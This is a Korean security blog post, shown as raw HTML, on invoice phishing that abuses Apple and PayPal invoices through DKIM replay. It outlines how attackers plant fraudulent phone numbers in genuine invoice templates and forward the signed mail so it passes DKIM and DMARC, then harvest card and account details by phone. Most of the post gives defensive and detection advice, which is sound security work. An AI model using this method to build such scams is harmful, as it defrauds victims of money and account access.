&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384106.png&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;676&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/lflbn/dJMcaivzMQ9/bfPy96EIo7LFg7mmLAVKVk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/lflbn/dJMcaivzMQ9/bfPy96EIo7LFg7mmLAVKVk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/lflbn/dJMcaivzMQ9/bfPy96EIo7LFg7mmLAVKVk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Flflbn%2FdJMcaivzMQ9%2FbfPy96EIo7LFg7mmLAVKVk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1200&quot; height=&quot;676&quot; data-filename=&quot;Group 2034384106.png&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;676&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;정상 플랫폼 기능을 악용한 송장 피싱 수법&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이 공격의 핵심은 플랫폼이 제공하는&amp;nbsp;공식 기능과 실제 메일 템플릿을 그대로 악용한다는 점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1152&quot; data-origin-height=&quot;976&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bc3GX8/dJMcaiIYzoQ/dkN3DDijdhLQwgfZsHeIw1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bc3GX8/dJMcaiIYzoQ/dkN3DDijdhLQwgfZsHeIw1/img.png&quot; data-alt=&quot;[이미지] App Store invoice abused by DKIM replay attack (출처: Kaseya)&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bc3GX8/dJMcaiIYzoQ/dkN3DDijdhLQwgfZsHeIw1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbc3GX8%2FdJMcaiIYzoQ%2FdkN3DDijdhLQwgfZsHeIw1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1152&quot; height=&quot;976&quot; data-origin-width=&quot;1152&quot; data-origin-height=&quot;976&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] App Store invoice abused by DKIM replay attack (출처: Kaseya)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;공격 과정은 다음과 같이 요약할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;공격자가 애플&amp;middot;페이팔 등의 계정 및 판매자 프로필을 생성&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;결제 요청서(Invoice)나 분쟁 알림을 자신의 이메일 주소로 발송&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;그 메일을 별도 변경 없이 여러 피해자에게 다시 전달(포워딩/리플레이)&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이때 공격자는 결제 요청서의&amp;nbsp;메모란, 설명란, 판매자명&amp;nbsp;등에 사기성 문구와 전화번호 등을 삽입합니다. 겉으로 보기에는 애플&amp;middot;페이팔에서 발송된 정상 결제 알림처럼 보이기 때문에, 사용자는 이를 실제 결제 오류나 무단 결제로 오인하고 이메일에 적힌 번호로 전화를 걸거나, 안내된 절차를 따르게 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;전화 연결 이후에는 상담원을 사칭한 공격자가 &amp;ldquo;결제 취소를 도와주겠다&amp;rdquo;, &amp;ldquo;계정 보호를 위해 본인 확인이 필요하다&amp;rdquo;는 명목으로 카드 번호, CVC, 일회용 인증번호, 계정 자격 증명 등을 요구하며 민감한 금융&amp;middot;계정 정보를 탈취합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;왜 더 위험할까? : DKIM 리플레이 공격의 구조적 맹점&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;815&quot; data-origin-height=&quot;976&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dG94h3/dJMcagLc9L3/SsscOOenHDzwzMG0eIKkHK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dG94h3/dJMcagLc9L3/SsscOOenHDzwzMG0eIKkHK/img.png&quot; data-alt=&quot;[이미지] PayPal disputed invoice abused by DKIM replay attacks (출처: Kaseya)&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dG94h3/dJMcagLc9L3/SsscOOenHDzwzMG0eIKkHK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdG94h3%2FdJMcagLc9L3%2FSsscOOenHDzwzMG0eIKkHK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;815&quot; height=&quot;976&quot; data-origin-width=&quot;815&quot; data-origin-height=&quot;976&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] PayPal disputed invoice abused by DKIM replay attacks (출처: Kaseya)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 공격이 특히 위험한 이유는 &lt;u&gt;DKIM 리플레이(DKIM Replay Attack)&lt;/u&gt; 기법을 활용한다는 점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;/span&gt;&amp;nbsp;DKIM(DomainKeys Identified Mail)은 발신 도메인이 위조되지 않았는지 확인하기 위해, 메일 본문과 일부 헤더에 대해 전자서명을 적용하는 이메일 인증 기술입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;애플&amp;middot;페이팔에서&amp;nbsp;원래&amp;nbsp;보낸&amp;nbsp;인보이스&amp;nbsp;메일은&amp;nbsp;이&amp;nbsp;DKIM&amp;nbsp;서명이&amp;nbsp;포함되어&amp;nbsp;있으며,&amp;nbsp;수신&amp;nbsp;서버에서는&amp;nbsp;이&amp;nbsp;서명이&amp;nbsp;유효한지&amp;nbsp;검증해&amp;nbsp;&lt;i&gt;&lt;span style=&quot;background-color: #dddddd;&quot;&gt;dkim=pass&amp;nbsp;&lt;/span&gt;&lt;/i&gt;판정을&amp;nbsp;내립니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;문제는 공격자가 자신에게 정상적으로 도착한 메일을 내용 변경 없이 그대로 재전송할 경우, 원본에 포함된 DKIM 서명이 그대로 유지된다는 점입니다. 메일 본문과 서명 대상 헤더가 변조되지 않기 때문에, 수신 서버 입장에서는 이 메일을 여전히 '해당 도메인(apple.com, paypal.com)에서 보낸 정상 메일'로 인식하게 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이 과정에서 SPF는 공격자의 발송 IP가 공식 발송 서버가 아니기 때문에 실패할 수 있지만, DMARC 정책이 'DKIM 또는 SPF 중 하나가 일치하면 통과'하도록 설정된 경우, 유효한 DKIM 서명만으로도&amp;nbsp;DMARC까지 통과하게 됩니다. 즉, 인증 프로토콜은 '누가 보냈는지(From 도메인)'는 확인하지만, '해당 내용이 안전한지, 악성 의도가 있는지'까지는 보장하지 못하는 구조적 한계를 노린 것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;이메일 인증만으로는 충분하지 않은 이유&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 사례는 이메일 보안이 단순히 SPF&amp;middot;DKIM&amp;middot;DMARC를 구성했다고 해서 자동으로 완결되는 체계가 아니라는 점을 분명히 보여줍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;인증은 어디까지나&amp;nbsp;발신 도메인의 정당성을 검증하는 수단입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;공격자는 이 정당한 발신 채널을 먼저 확보한 뒤, 그 안에 사회공학(Social Engineering) 요소와 금융 사기를 끼워 넣어 악용하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;특히 기업 환경에서는 재무&amp;middot;구매&amp;middot;영업 조직이 실제 결제 요청, 인보이스, 구독 갱신&amp;middot;취소 알림을 빈번하게 수신합니다. 이 때문에&amp;nbsp;정상 업무 흐름과 매우 유사한 형태로 위장한 송장 피싱에 취약할 수밖에 없습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;단 한 번의 전화 통화나 링크 클릭만으로도 계정 탈취와 카드 정보 유출이 발생할 수 있고, 그 여파가 개인을 넘어 회사 계정, SaaS 구독, 결제 채널까지 확산될 수 있다는 점에서 조직 전체 리스크로 이어질 수 있습니다.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;조직 차원의 대응 전략과 점검 포인트&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안팀&amp;middot;IT 운영팀은 단순히 인증 결과만 보지 말고, 아래와 같은 관점에서 추가적인 방어&amp;middot;모니터링 체계를 마련할 필요가 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;1) 이메일 인증 결과 해석 고도화&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #dddddd;&quot;&gt;&lt;i&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;dkim=pass&lt;/i&gt;&lt;/span&gt;, &lt;i&gt;&lt;span style=&quot;background-color: #dddddd;&quot;&gt;dmarc=pass&lt;/span&gt;&lt;/i&gt;라는 이유만으로 메일을 자동 '정상'으로 분류하지 않도록 정책을 설계해야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;/span&gt;발신 도메인이 애플&amp;middot;페이팔 등으로 표시되더라도, 발송 IP가 해당 업체의 공식 SPF 범위에 포함되는지, 과거 정상 트래픽 패턴과 일치하는지는 별도로 검증하는 것이 바람직합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;2) 수신자 정보 정합성 검증 강화&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;메일 게이트웨이에서 Envelope To(실제 수신자)와 메일 헤더의 To, 내부 디렉터리의 실제 사용자 정보가 일치하는지 검사하는 정책을 강화합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;벤더 인보이스 메일인데 조직 내 다수 사용자에게 동시&amp;middot;반복적으로 전달되는 패턴, 혹은 명백히 관계 없는 부서/계정으로 발송되는 경우를 이상 징후로 인식해 추가 점검 대상으로 분류할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;3) 금융 행위와 연결된 메일에 대한 별도 처리&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;결제 요청서, 송장, 구독 갱신&amp;middot;취소, 분쟁 해결 안내 등 금융&amp;middot;결제와 직결되는 메일에 대해서는 별도의 경고 배너나 사용자 주의 문구를 자동으로 삽입하는 방안을 고려합니다.&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;문구 예시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;ldquo;결제 취소&amp;middot;환불을 요청하는 메일입니다. 메일의 전화번호&amp;middot;링크 대신 공식 웹사이트 또는 앱을 직접 열어 확인하세요.&amp;rdquo;와 같은 명시적 경고를 표시합니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;4) DKIM 리플레이 패턴 탐지&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;동일한 DKIM 서명을 가진 인보이스/알림 메일이 단기간에 여러 수신자에게 반복적으로 들어오는지 모니터링하는 규칙을 마련합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎ &lt;/span&gt;애플&amp;middot;페이팔 등에서 온 것으로 보이지만, 발송 IP가 공식 공개 정보와 크게 동떨어져 있거나, 특정 외부 호스팅/프록시에서 반복적으로 포착되는 경우 우선 격리 후 검토하는 것도 한 방법입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;임직원&amp;middot;개인&amp;nbsp;사용자&amp;nbsp;행동&amp;nbsp;수칙&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기술적&amp;nbsp;방어와&amp;nbsp;더불어,&amp;nbsp;사용자&amp;nbsp;인식&amp;nbsp;제고와&amp;nbsp;보안&amp;nbsp;교육이&amp;nbsp;무엇보다&amp;nbsp;중요합니다.&amp;nbsp;다음&amp;nbsp;원칙을&amp;nbsp;반드시&amp;nbsp;안내&amp;middot;교육하는&amp;nbsp;것을&amp;nbsp;권장합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333; text-align: start;&quot;&gt;1) '정상 도메인 = 안전'이라는 생각 버리기&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #dddddd;&quot;&gt;&lt;i&gt;service@paypal.com&lt;/i&gt;&lt;/span&gt;, &lt;i&gt;&lt;span style=&quot;background-color: #dddddd;&quot;&gt;no-reply@apple.com&lt;/span&gt; &lt;/i&gt;처럼 보여도, 그 메일이 항상 안전하다고 가정해서는 안 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪︎&lt;span&gt; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;브랜드 로고, 공식 템플릿, 도메인이 모두 진짜일 수 있지만, 그 안에 포함된 전화번호&amp;middot;문의 경로&amp;middot;설명 문구가 공격자가 삽입한 것일 수 있다는 점을 강조해야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2) &lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;전화번호&amp;middot;링크는 사용하지 말고, 직접 접속해 확인하기&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
